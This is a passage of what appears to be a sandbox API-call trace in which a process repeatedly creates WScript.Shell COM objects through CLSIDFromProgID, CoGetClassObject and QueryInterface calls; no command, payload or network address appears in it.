[0059.583] FileSystemObject:IUnknown:Release (This=0x7e400) returned 0x1
[0059.583] CLSIDFromProgID (in: lpszProgID="WScript.Shell", lpclsid=0xceda4 | out: lpclsid=0xceda4*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0
[0059.584] SysStringLen (param_1=0x0) returned 0x0
[0059.584] CoGetClassObject (in: rclsid=0xceda4*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x5, pvReserved=0x0, riid=0x6d1e087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xced98 | out: ppv=0xced98*=0x2c5774) returned 0x0
[0059.590] WshShell:IUnknown:QueryInterface (in: This=0x2c5774, riid=0x6d1e7884*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0xced94 | out: ppvObject=0xced94*=0x0) returned 0x80004002
[0059.590] WshShell:IClassFactory:CreateInstance (in: This=0x2c5774, pUnkOuter=0x0, riid=0x6d1e0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xced9c | out: ppvObject=0xced9c*=0x2cefc4) returned 0x0
[0059.590] WshShell:IUnknown:Release (This=0x2c5774) returned 0x0
[0059.591] CoTaskMemFree (pv=0x290790)
[0059.591] WshShell:IUnknown:QueryInterface (in: This=0x2cefc4, riid=0x6d1e5a50*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0xced50 | out: ppvObject=0xced50*=0x0) returned 0x80004002
[0059.591] WshShell:IUnknown:QueryInterface (in: This=0x2cefc4, riid=0x6d1e5700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0xced3c | out: ppvObject=0xced3c*=0x0) returned 0x80004002
[0059.591] WshShell:IUnknown:QueryInterface (in: This=0x2cefc4, riid=0x6d1e55f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0xced38 | out: ppvObject=0xced38*=0x0) returned 0x80004002
[0059.591] WshShell:IUnknown:QueryInterface (in: This=0x2cefc4, riid=0x6d1e5608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xced34 | out: ppvObject=0xced34*=0x0) returned 0x80004002
[0059.592] WshShell:IUnknown:QueryInterface (in: This=0x2cefc4, riid=0x6d1e5764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0xced30 | out: ppvObject=0xced30*=0x0) returned 0x80004002
[0059.592] WshShell:IUnknown:QueryInterface (in: This=0x2cefc4, riid=0x6d1e5710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xced2c | out: ppvObject=0xced2c*=0x2c57bc) returned 0x0
[0059.594] WshShell:IUnknown:Release (This=0x2cefc4) returned 0x1
[0059.594] CLSIDFromProgID (in: lpszProgID="WScript.Shell", lpclsid=0xceda4 | out: lpclsid=0xceda4*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0
[0059.594] SysStringLen (param_1=0x0) returned 0x0
[0059.594] CoGetClassObject (in: rclsid=0xceda4*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x5, pvReserved=0x0, riid=0x6d1e087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xced98 | out: ppv=0xced98*=0x28b94c) returned 0x0
[0059.595] WshShell:IUnknown:QueryInterface (in: This=0x28b94c, riid=0x6d1e7884*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0xced94 | out: ppvObject=0xced94*=0x0) returned 0x80004002
[0059.595] WshShell:IClassFactory:CreateInstance (in: This=0x28b94c, pUnkOuter=0x0, riid=0x6d1e0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xced9c | out: ppvObject=0xced9c*=0x2cf1a4) returned 0x0
[0059.595] WshShell:IUnknown:Release (This=0x28b94c) returned 0x0
[0059.595] CoTaskMemFree (pv=0x290790)
[0059.595] WshShell:IUnknown:QueryInterface (in: This=0x2cf1a4, riid=0x6d1e5a50*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0xced50 | out: ppvObject=0xced50*=0x0) returned 0x80004002
[0059.596] WshShell:IUnknown:QueryInterface (in: This=0x2cf1a4, riid=0x6d1e5700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0xced3c | out: ppvObject=0xced3c*=0x0) returned 0x80004002
[0059.596] WshShell:IUnknown:QueryInterface (in: This=0x2cf1a4, riid=0x6d1e55f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0xced38 | out: ppvObject=0xced38*=0x0) returned 0x80004002
[0059.596] WshShell:IUnknown:QueryInterface (in: This=0x2cf1a4, riid=0x6d1e5608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xced34 | out: ppvObject=0xced34*=0x0) returned 0x80004002
[0059.596] WshShell:IUnknown:QueryInterface (in: This=0x2cf1a4, riid=0x6d1e5764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0xced30 | out: ppvObject=0xced30*=0x0) returned 0x80004002
[0059.596] WshShell:IUnknown:QueryInterface (in: This=0x2cf1a4, riid=0x6d1e5710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xced2c | out: ppvObject=0xced2c*=0x2c5894) returned 0x0
[0059.597] WshShell:IUnknown:Release (This=0x2cf1a4) returned 0x1
[0059.597] CLSIDFromProgID (in: lpszProgID="WScript.Shell", lpclsid=0xceda4 | out: lpclsid=0xceda4*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0
[0059.597] SysStringLen (param_1=0x0) returned 0x0
[0059.597] CoGetClassObject (in: rclsid=0xceda4*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x5, pvReserved=0x0, riid=0x6d1e087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xced98 | out: ppv=0xced98*=0x2c5804) returned 0x0
[0059.597] WshShell:IUnknown:QueryInterface (in: This=0x2c5804, riid=0x6d1e7884*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0xced94 | out: ppvObject=0xced94*=0x0) returned 0x80004002
[0059.597] WshShell:IClassFactory:CreateInstance (in: This=0x2c5804, pUnkOuter=0x0, riid=0x6d1e0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xced9c | out: ppvObject=0xced9c*=0x2cf384) returned 0x0
[0059.598] WshShell:IUnknown:Release (This=0x2c5804) returned 0x0
[0059.598] CoTaskMemFree (pv=0x2907a0)
[0059.598] WshShell:IUnknown:QueryInterface (in: This=0x2cf384, riid=0x6d1e5a50*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0xced50 | out: ppvObject=0xced50*=0x0) returned 0x80004002
[0059.598] WshShell:IUnknown:QueryInterface (in: This=0x2cf384, riid=0x6d1e5700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0xced3c | out: ppvObject=0xced3c*=0x0) returned 0x80004002
[0059.598] WshShell:IUnknown:QueryInterface (in: This=0x2cf384, riid=0x6d1e55f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0xced38 | out: ppvObject=0xced38*=0x0) returned 0x80004002
[0059.598] WshShell:IUnknown:QueryInterface (in: This=0x2cf384, riid=0x6d1e5608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xced34 | out: ppvObject=0xced34*=0x0) returned 0x80004002
[0059.599] WshShell:IUnknown:QueryInterface (in: This=0x2cf384, riid=0x6d1e5764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0xced30 | out: ppvObject=0xced30*=0x0) returned 0x80004002
[0059.599] WshShell:IUnknown:QueryInterface (in: This=0x2cf384, riid=0x6d1e5710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xced2c | out: ppvObject=0xced2c*=0x2c596c) returned 0x0
[0059.599] WshShell:IUnknown:Release (This=0x2cf384) returned 0x1
[0059.599] CLSIDFromProgID (in: lpszProgID="WScript.Shell", lpclsid=0xceda4 | out: lpclsid=0xceda4*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0
[0059.599] SysStringLen (param_1=0x0) returned 0x0
[0059.599] CoGetClassObject (in: rclsid=0xceda4*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x5, pvReserved=0x0, riid=0x6d1e087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xced98 | out: ppv=0xced98*=0x2c58dc) returned 0x0
[0059.600] WshShell:IUnknown:QueryInterface (in: This=0x2c58dc, riid=0x6d1e7884*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0xced94 | out: ppvObject=0xced94*=0x0) returned 0x80004002
[0059.600] WshShell:IClassFactory:CreateInstance (in: This=0x2c58dc, pUnkOuter=0x0, riid=0x6d1e0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xced9c | out: ppvObject=0xced9c*=0x2cf564) returned 0x0
[0059.600] WshShell:IUnknown:Release (This=0x2c58dc) returned 0x0
[0059.601] CoTaskMemFree (pv=0x2905b0)
[0059.601] WshShell:IUnknown:QueryInterface (in: This=0x2cf564, riid=0x6d1e5a50*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0xced50 | out: ppvObject=0xced50*=0x0) returned 0x80004002
[0059.601] WshShell:IUnknown:QueryInterface (in: This=0x2cf564, riid=0x6d1e5700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0xced3c | out: ppvObject=0xced3c*=0x0) returned 0x80004002
[0059.601] WshShell:IUnknown:QueryInterface (in: This=0x2cf564, riid=0x6d1e55f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0xced38 | out: ppvObject=0xced38*=0x0) returned 0x80004002
[0059.601] WshShell:IUnknown:QueryInterface (in: This=0x2cf564, riid=0x6d1e5608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xced34 | out: ppvObject=0xced34*=0x0) returned 0x80004002
[0059.601] WshShell:IUnknown:QueryInterface (in: This=0x2cf564, riid=0x6d1e5764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0xced30 | out: ppvObject=0xced30*=0x0) returned 0x80004002
[0059.602] WshShell:IUnknown:QueryInterface (in: This=0x2cf564, riid=0x6d1e5710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xced2c | out: ppvObject=0xced2c*=0x2c5a44) returned 0x0
[0059.602] WshShell:IUnknown:Release (This=0x2cf564) returned 0x1
[0059.602] CLSIDFromProgID (in: lpszProgID="WScript.Shell", lpclsid=0xceda4 | out: lpclsid=0xceda4*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0
[0059.602] SysStringLen (param_1=0x0) returned 0x0
[0059.602] CoGetClassObject (in: rclsid=0xceda4*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x5, pvReserved=0x0, riid=0x6d1e087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xced98 | out: ppv=0xced98*=0x2c59b4) returned 0x0
[0059.603] WshShell:IUnknown:QueryInterface (in: This=0x2c59b4, riid=0x6d1e7884*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0xced94 | out: ppvObject=0xced94*=0x0) returned 0x80004002
[0059.603] WshShell:IClassFactory:CreateInstance (in: This=0x2c59b4, pUnkOuter=0x0, riid=0x6d1e0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xced9c | out: ppvObject=0xced9c*=0x2cf744) returned 0x0
[0059.603] WshShell:IUnknown:Release (This=0x2c59b4) returned 0x0
[0059.603] CoTaskMemFree (pv=0x290790)
[0059.603] WshShell:IUnknown:QueryInterface (in: This=0x2cf744, riid=0x6d1e5a50*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0xced50 | out: ppvObject=0xced50*=0x0) returned 0x80004002
[0059.604] WshShell:IUnknown:QueryInterface (in: This=0x2cf744, riid=0x6d1e5700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0xced3c | out: ppvObject=0xced3c*=0x0) returned 0x80004002
[0059.604] WshShell:IUnknown:QueryInterface (in: This=0x2cf744, riid=0x6d1e55f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0xced38 | out: ppvObject=0xced38*=0x0) returned 0x80004002
[0059.604] WshShell:IUnknown:QueryInterface (in: This=0x2cf744, riid=0x6d1e5608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xced34 | out: ppvObject=0xced34*=0x0) returned 0x80004002
[0059.604] WshShell:IUnknown:QueryInterface (in: This=0x2cf744, riid=0x6d1e5764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0xced30 | out: ppvObject=0xced30*=0x0) returned 0x80004002
[0059.604] WshShell:IUnknown:QueryInterface (in: This=0x2cf744, riid=0x6d1e5710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xced2c | out: ppvObject=0xced2c*=0x2c5b1c) returned 0x0
[0059.605] WshShell:IUnknown:Release (This=0x2cf744) returned 0x1
[0059.605] CLSIDFromProgID (in: lpszProgID="WScript.Shell", lpclsid=0xceda4 | out: lpclsid=0xceda4*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0
[0059.605] SysStringLen (param_1=0x0) returned 0x0
[0059.605] CoGetClassObject (in: rclsid=0xceda4*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x5, pvReserved=0x0, riid=0x6d1e087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xced98 | out: ppv=0xced98*=0x2c5a8c) returned 0x0
[0059.605] WshShell:IUnknown:QueryInterface (in: This=0x2c5a8c, riid=0x6d1e7884*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0xced94 | out: ppvObject=0xced94*=0x0) returned 0x80004002
[0059.606] WshShell:IClassFactory:CreateInstance (in: This=0x2c5a8c, pUnkOuter=0x0, riid=0x6d1e0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xced9c | out: ppvObject=0xced9c*=0x2cf924) returned 0x0
[0059.606] WshShell:IUnknown:Release (This=0x2c5a8c) returned 0x0
[0059.606] CoTaskMemFree (pv=0x2907a0)
[0059.606] WshShell:IUnknown:QueryInterface (in: This=0x2cf924, riid=0x6d1e5a50*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0xced50 | out: ppvObject=0xced50*=0x0) returned 0x80004002
[0059.606] WshShell:IUnknown:QueryInterface (in: This=0x2cf924, riid=0x6d1e5700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0xced3c | out: ppvObject=0xced3c*=0x0) returned 0x80004002
[0059.607] WshShell:IUnknown:QueryInterface (in: This=0x2cf924, riid=0x6d1e55f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0xced38 | out: ppvObject=0xced38*=0x0) returned 0x80004002
[0059.607] WshShell:IUnknown:QueryInterface (in: This=0x2cf924, riid=0x6d1e5608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xced34 | out: ppvObject=0xced34*=0x0) returned 0x80004002
[0059.607] WshShell:IUnknown:QueryInterface (in: This=0x2cf924, riid=0x6d1e5764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0xced30 | out: ppvObject=0xced30*=0x0) returned 0x80004002
[0059.607] WshShell:IUnknown:QueryInterface (in: This=0x2cf924, riid=0x6d1e5710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xced2c | out: ppvObject=0xced2c*=0x2a7ddc) returned 0x0
[0059.607] WshShell:IUnknown:Release (This=0x2cf924) returned 0x1
[0059.607] CLSIDFromProgID (in: lpszProgID="WScript.Shell", lpclsid=0xceda4 | out: lpclsid=0xceda4*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0
[0059.608] SysStringLen (param_1=0x0) returned 0x0
[0059.608] CoGetClassObject (in: rclsid=0xceda4*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x5, pvReserved=0x0, riid=0x6d1e087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xced98 | out: ppv=0xced98*=0x2c5b64) returned 0x0
[0059.608] WshShell:IUnknown:QueryInterface (in: This=0x2c5b64, riid=0x6d1e7884*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0xced94 | out: ppvObject=0xced94*=0x0) returned 0x80004002
[0059.608] WshShell:IClassFactory:CreateInstance (in: This=0x2c5b64, pUnkOuter=0x0, riid=0x6d1e0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xced9c | out: ppvObject=0xced9c*=0x2cfb04) returned 0x0
[0059.609] WshShell:IUnknown:Release (This=0x2c5b64) returned 0x0
[0059.609] CoTaskMemFree (pv=0x2905b0)
[0059.609] WshShell:IUnknown:QueryInterface (in: This=0x2cfb04, riid=0x6d1e5a50*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0xced50 | out: ppvObject=0xced50*=0x0) returned 0x80004002
[0059.609] WshShell:IUnknown:QueryInterface (in: This=0x2cfb04, riid=0x6d1e5700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0xced3c | out: ppvObject=0xced3c*=0x0) returned 0x80004002
[0059.609] WshShell:IUnknown:QueryInterface (in: This=0x2cfb04, riid=0x6d1e55f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0xced38 | out: ppvObject=0xced38*=0x0) returned 0x80004002
[0059.609] WshShell:IUnknown:QueryInterface (in: This=0x2cfb04, riid=0x6d1e5608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xced34 | out: ppvObject=0xced34*=0x0) returned 0x80004002
[0059.610] WshShell:IUnknown:QueryInterface (in: This=0x2cfb04, riid=0x6d1e5764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0xced30 | out: ppvObject=0xced30*=0x0) returned 0x80004002
